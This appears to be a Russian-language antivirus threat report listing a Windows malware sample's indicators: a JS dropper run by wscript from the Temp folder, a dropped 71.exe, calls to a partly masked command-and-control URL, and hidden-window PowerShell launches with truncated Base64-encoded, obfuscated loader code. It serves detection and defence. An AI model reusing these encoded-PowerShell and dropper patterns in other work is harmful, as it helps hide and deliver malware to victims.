Техническая информация
- '<SYSTEM32>\wscript.exe' "%WINDIR%\Temp\XfXVGlatDSaFaVaVJ.js"
- %WINDIR%\temp\xfxvglatdsafavavj.js
- %WINDIR%\temp\71.exe
- http://kf####ariane.com/qtra/ttqr.php?l=#########
- http://www.kf####ariane.com/qtra/ttqr.php?l=#########
- DNS ASK kf####ariane.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBt...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBt...